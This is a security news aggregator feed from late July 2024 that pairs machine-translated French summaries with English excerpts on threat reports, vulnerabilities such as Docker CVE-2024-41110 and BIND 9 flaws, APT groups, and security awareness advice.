	2024-07-25 16:58:16	Les défauts critiques de la ServiceNow RCE sont activement exploités pour voler des informations d'identification Critical ServiceNow RCE flaws actively exploited to steal credentials (lien direct)	Les acteurs de la menace se regroupent ensemble de défauts de service à l'aide d'exploits accessibles au public pour violer les agences gouvernementales et les entreprises privées dans les attaques de vol de données.[...] Threat actors are chaining together ServiceNow flaws using publicly available exploits to breach government agencies and private firms in data theft attacks. [...]	Threat		★★★★
	2024-07-25 15:32:05	La société de sécurité embauche accidentellement un piratage nord-coréen, ne savait pasBe4 Security Firm Accidentally Hires North Korean Hacker, Did Not KnowBe4 (lien direct)	Un ingénieur logiciel embauché pour une équipe interne de l'IT IA est immédiatement devenu une menace d'initié en chargeant des logiciels malveillants sur son poste de travail. A software engineer hired for an internal IT AI team immediately became an insider threat by loading malware onto his workstation.	Malware Threat		★★★★
	2024-07-25 15:28:00	Webinaire: sécuriser l'espace de travail moderne: ce que les entreprises doivent savoir sur la sécurité du navigateur d'entreprise Webinar: Securing the Modern Workspace: What Enterprises MUST Know about Enterprise Browser Security (lien direct)	Le navigateur est le centre nerveux de l'espace de travail moderne.Ironiquement, cependant, le navigateur est également l'une des surfaces de menace les moins protégées de l'entreprise moderne.Les outils de sécurité traditionnels offrent peu de protection contre les menaces basées sur le navigateur, laissant les organisations exposées.La cybersécurité moderne nécessite une nouvelle approche basée sur la protection du navigateur lui-même, qui offre les deux The browser is the nerve center of the modern workspace. Ironically, however, the browser is also one of the least protected threat surfaces of the modern enterprise. Traditional security tools provide little protection against browser-based threats, leaving organizations exposed. Modern cybersecurity requires a new approach based on the protection of the browser itself, which offers both	Tool Threat		★★★
	2024-07-25 14:41:59	5 stratégies pour établir les bonnes KPI de cybersécurité 5 Strategies for Setting the Right Cybersecurity KPIs (lien direct)	Les indicateurs de performance clés de la cybersécurité (KPI) mesurent l'efficacité du programme de cybersécurité de l'organisation.Dans un paysage de menace en évolution rapide caractérisée par de nouvelles identités, environnements et méthodes d'attaque, de nombreux KPI potentiels existent pour suivre.Mesurer aussi ... Cybersecurity key performance indicators (KPIs) measure the efficacy of an organization\'s cybersecurity program. In a rapidly changing threat landscape characterized by new identities, environments and attack methods, many potential KPIs exist to track. Measuring too...	Threat		★★★
	2024-07-25 14:00:00	APT45: Machine militaire numérique de la Corée du Nord APT45: North Korea\\'s Digital Military Machine (lien direct)	Written by: Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, Michael Barnhart Executive Summary APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009. APT45 has gradually expanded into financially-motivated operations, and the group\'s suspected development and deployment of ransomware sets it apart from other North Korean operators. APT45 and activity clusters suspected of being linked to the group are strongly associated with a distinct genealogy of malware families separate from peer North Korean operators like TEMP.Hermit and APT43. Among the groups assessed to operate from the Democratic People\'s Republic of Korea (DPRK), APT45 has been the most frequently observed targeting critical infrastructure. Overview Mandiant assesses with high confidence that APT45 is a moderately sophisticated cyber operator that supports the interests of the DPRK. Since at least 2009, APT45 has carried out a range of cyber operations aligned with the shifting geopolitical interests of the North Korean state. Although the group\'s earliest observed activities consisted of espionage campaigns against government agencies and defense industries, APT45 has expanded its remit to financially-motivated operations, including targeting of the financial vertical; we also assess with moderate confidence that APT45 has engaged in the development of ransomware. Additionally, while multiple DPRK-nexus groups focused on healthcare and pharmaceuticals during the initial stages of the COVID-19 pandemic, APT45 has continued to target this vertical longer than other groups, suggesting an ongoing mandate to collect related information. Separately, the group has conducted operations against nuclear-related entities, underscoring its role in supporting DPRK priorities. Shifts in Targeting and Expanding Operations Similar to other cyber threat activity attributed to North Korea-nexus groups, shifts in APT45 operations have reflected the DPRK\'s changing priorities. Malware samples indicate the group was active as early as 2009, although an observed focus on government agencies and the defense industry was observed beginning in 2017. Identified activity in 2019 aligned with Pyongyang\'s continued interest in nuclear issues and energy. Although it is not clear if financially-motivated operations are a focus of APT45\'s current mandate, the group is distinct from other North Korean operators in its suspected interest in ransomware. Given available information, it is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities. Financial Sector Like other North Korea	Ransomware Malware Tool Threat Medical	APT 37 APT 43	★★★★★
	2024-07-25 13:59:00	Les chercheurs révèlent une vulnérabilité de fonction confuse dans Google Cloud Platform Researchers Reveal ConfusedFunction Vulnerability in Google Cloud Platform (lien direct)	Les chercheurs en cybersécurité ont divulgué une vulnérabilité d'escalade des privilèges impactant le service de fonctions cloud de Google Cloud Platform \\ qu'un attaquant pourrait exploiter pour accéder à d'autres services et données sensibles de manière non autorisée. Tenable a donné à la vulnérabilité le nom ConfusedFunction. "Un attaquant pourrait dégénérer ses privilèges sur le compte de service de construction de cloud par défaut et Cybersecurity researchers have disclosed a privilege escalation vulnerability impacting Google Cloud Platform\'s Cloud Functions service that an attacker could exploit to access other services and sensitive data in an unauthorized manner. Tenable has given the vulnerability the name ConfusedFunction. "An attacker could escalate their privileges to the Default Cloud Build Service Account and	Vulnerability Threat Cloud		★★★
	2024-07-25 13:08:08	Coucoo Spear & # 8211;le dernier acteur de menace nationale ciblant les entreprises japonaises Cuckoo Spear – the latest Nation-state Threat Actor targeting Japanese companies (lien direct)	Highly sophisticated, well-funded, and strategically motivated nation-state cybersecurity threats are complex and challenging, requiring advanced cybersecurity measures, threat intelligence, and international cooperation. Government agencies or state-sponsored groups, are engaging in cyber-attacks for various reasons, including espionage, sabotage, or for political influence.	Threat		★★★
	2024-07-25 13:02:02	Doppelgänger : Opérations de manipulation de l\'information en cours en Europe et aux Etats-Unis (lien direct)	L'équipe de Cyber Threat Research d'HarfangLab a enquêté sur les opérations de manipulation de l'information Doppelgänger, de la mi-juin à la mi-juillet, afin d'apporter des renseignements complémentaires sur l'infrastructure, les tactiques et les motivations associées en Europe et aux États-Unis, où les élections politiques occupent l'attention des médias et des réseaux sociaux. - Investigations	Threat		★★★★
	2024-07-25 13:00:00	Campagne de phishing ciblant les utilisateurs mobiles en Inde en utilisant les leurres en Inde Phishing Campaign Targeting Mobile Users in India Using India Post Lures (lien direct)	L'équipe de recherche sur les menaces de Fortiguard Labs a récemment observé un certain nombre de publications sur les réseaux sociaux commentant une campagne de fraude ciblant les publications de l'Inde.Apprendre encore plus. The FortiGuard Labs Threat Research team recently observed a number of social media posts commenting on a fraud campaign targeting India Post users. Learn more.	Threat Mobile		★★★
	2024-07-25 12:03:21	Kaspersky dit que l'oncle Sam a snobbed proposition d'ouvrir son code pour une revue tierce Kaspersky says Uncle Sam snubbed proposal to open up its code for third-party review (lien direct)	Ces affirmations de menace de sécurité nationale?\\ 'Aucune preuve, \' VP indique au reg exclusif malgré la détermination des fédérales \\ 'à interdire le logiciel de sécurité de Kaspersky \\ aux États-Unis, le RusseLes entreprises avancent avec une autre proposition d'ouvrir ses données et ses produits à l'examen tiers & # 8211;et prouve à l'oncle Sam que son code n'a pas été compromis par les espions du Kremlin.… Those national security threat claims? \'No evidence,\' VP tells The Reg Exclusive Despite the Feds\' determination to ban Kaspersky\'s security software in the US, the Russian business is moving forward with another proposal to open up its data and products to third-party review – and prove to Uncle Sam that its code hasn\'t been compromised by Kremlin spies.…	Threat		★★★
	2024-07-25 11:17:00	Le défaut de moteur Docker critique permet aux attaquants de contourner les plugins d'autorisation Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins (lien direct)	Docker avertit un défaut critique ayant un impact sur certaines versions de Docker Engine qui pourraient permettre à un attaquant de contourner les plugins d'autorisation (AUTHZ) dans des circonstances spécifiques. Suivi en CVE-2024-41110, la vulnérabilité d'escalade de contournement et de privilège comporte un score CVSS de 10,0, indiquant une gravité maximale. "Un attaquant pourrait exploiter un contournement à l'aide d'une demande d'API avec un ensemble de longueur de contenu Docker is warning of a critical flaw impacting certain versions of Docker Engine that could allow an attacker to sidestep authorization plugins (AuthZ) under specific circumstances. Tracked as CVE-2024-41110, the bypass and privilege escalation vulnerability carries a CVSS score of 10.0, indicating maximum severity. "An attacker could exploit a bypass using an API request with Content-Length set	Vulnerability Threat		★★★
	2024-07-25 11:00:48	Dégeler votre stratégie de sécurité des e-mails avec le rapport radar 2024 de Frost \\: un paysage dynamique de cyber-menace Thawing Your Email Security Strategy with Frost\\'s 2024 Radar Report: A Dynamic Cyber Threat Landscape (lien direct)	> Dans l'ère numérique d'aujourd'hui, le courrier électronique reste le principal conduit pour la communication d'entreprise, ce qui en fait une cible privilégiée pour les cybercriminels.Le rapport de recherche sur le radar Frost sur la sécurité des e-mails pour 2024 souligne l'importance critique des mesures de sécurité par e-mail robustes au milieu d'un paysage de menace en constante évolution.Avec la prolifération des attaques de phishing et des logiciels malveillants, la nécessité d'un [& # 8230;] avancé [& # 8230;] Le post dégeler votre stratégie de sécurité par e-mail avec Frost \'sRapport radar 2024: Un paysage dynamique de cyber-menaces est apparu pour la première fois sur slashnext . >In today’s digital age, email remains the primary conduit for business communication, making it a prime target for cybercriminals. The Frost Radar Research Report on Email Security for 2024 underscores the critical importance of robust email security measures amidst an ever-evolving threat landscape. With the proliferation of phishing attacks and malware, the need for advanced […] The post Thawing Your Email Security Strategy with Frost\'s 2024 Radar Report: A Dynamic Cyber Threat Landscape first appeared on SlashNext.	Malware Threat		★★★
	2024-07-25 11:00:00	CISA prévient les vulnérabilités exploitables dans le logiciel populaire Bind 9 DNS CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software (lien direct)	L'Internet Systems Consortium (ISC) a publié des correctifs pour aborder plusieurs vulnérabilités de sécurité dans la suite logicielle du Domain Domain (BIND) 9 de noms de domaine (DNS) de Berkeley qui pourrait être exploitée pour déclencher une condition de déni de service (DOS). "Un acteur de cybermenace pourrait exploiter l'une de ces vulnérabilités pour provoquer une condition de déni de service", la cybersécurité américaine et The Internet Systems Consortium (ISC) has released patches to address multiple security vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could be exploited to trigger a denial-of-service (DoS) condition. "A cyber threat actor could exploit one of these vulnerabilities to cause a denial-of-service condition," the U.S. Cybersecurity and	Vulnerability Threat		★★★
	2024-07-25 08:01:00	Sidewinder utilise de nouvelles infrastructures pour cibler les ports et les installations maritimes en mer Méditerranée SideWinder Utilizes New Infrastructure to Target Ports and Maritime Facilities in the Mediterranean Sea (lien direct)	Dans le cadre de nos efforts de chasse à la menace continue, l'équipe de recherche et de renseignement sur les menaces de BlackBerry a découvert une nouvelle campagne de l'acteur de menace Sidewinder, ciblant les ports et les installations maritimes dans l'océan Indien et la mer Méditerranée. As part of our continuous threat hunting efforts, the BlackBerry Threat Research and Intelligence team has discovered a new campaign by the threat actor SideWinder, targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea.	Threat	APT-C-17	★★★
	2024-07-25 06:04:58	3 Conseils pour créer un programme efficace de sensibilisation à la sécurité pour vos employés 3 Tips to Build an Effective Security Awareness Program for Your Employees (lien direct)	There are three cybersecurity truths that have stood the test of time (so far). Most breaches involve the human element. The latest Data Breach Investigations Report (DBIR) from Verizon notes that more than three-quarters (76%) of all breaches involve a human element. Phishing is one of the most common tactics for gaining initial access to a business. The DBIR says phishing was the second-most used tactic in 2023, right after stolen credentials. (Notably, credentials are often lost in phishing attacks first.) People are willing to take risks. That\'s why they often fall victim to attacks-because they take risky actions, like clicking on links and opening attachments from people they don\'t know. Research for our 2024 State of the Phish report shows that 68% of people do this. Given these truths, a human-centric security strategy is critical to protecting an organization. And mitigating human risk should be an important foundational pillar. This approach to cybersecurity recognizes that while technological solutions are essential, they are not sufficient on their own. Human behavior must be addressed directly. If you build an awareness program that is guided by threat intelligence and gives users the tools to respond to phishing attacks, you can attain quantifiable results. In this blog, we\'ll discuss three tips that you can use right now to build your security awareness training program in a way that empowers your employees to change their behavior. Tip 1: Prioritize high-risk user groups Human-centric cybersecurity starts with having visibility into who presents the greatest risk to your business. Often, the actions of a very small percentage of employees are the root cause of most security incidents. When you understand who presents the most risk, you can maximize your program\'s impact by improving the resilience of these individuals. For our 2024 State of the Phish report, we asked information security professionals who they believe represent the greatest risk to their organizations. The top group were the users who had access to critical data (privileged users). A chart that shows users who represent risk within companies. (Source: 2024 State of the Phish report from Proofpoint.) Privilege risk is one key factor in quantifying total human risk. It considers the amount of damage that could result from a successful attack. However, you must also consider: Attack risk, which demonstrates that the more a person has been attacked in the recent past, the higher the probability that they will be attacked in the near future. Vulnerability risk, which evaluates the probability that an attack would be successful if a person is attacked. For this risk factor, it is important to track both real and simulated user behaviors such as actual URL clicks within live email and performance against security awareness knowledge assessments and phishing simulations. Proofpoint makes it easy to quantify human risk and identify who represents the greatest risk to your business. Instead of manually tracking human risk across the three key risk factors of privilege, attack and vulnerability, our customers can use Proofpoint Nexus People Risk Explorer (NPRE). With NPRE, each person receives a user risk score based on their behavior and identity information. Users are automatically grouped based on their scores. With user risk insights from NPRE, you can easily prioritize which groups need the most attention and decide how to best deliver your training to maximize its impact. A view of the dashboard for Nexus People Risk Explorer. Tip 2: Keep your program agile The threat landscape impacts every business differently. Comparing a financial services company to a manufacturing company may show that the former is targeted more often with ransomware than supply-chained based BEC attacks. It is important to keep your program agile so that you can easily adjust	Ransomware Data Breach Tool Vulnerability Threat Cloud		★★★

Last update at: 2024-07-29 21:18:47
See our sources.

To see everything: Our RSS (filtrered)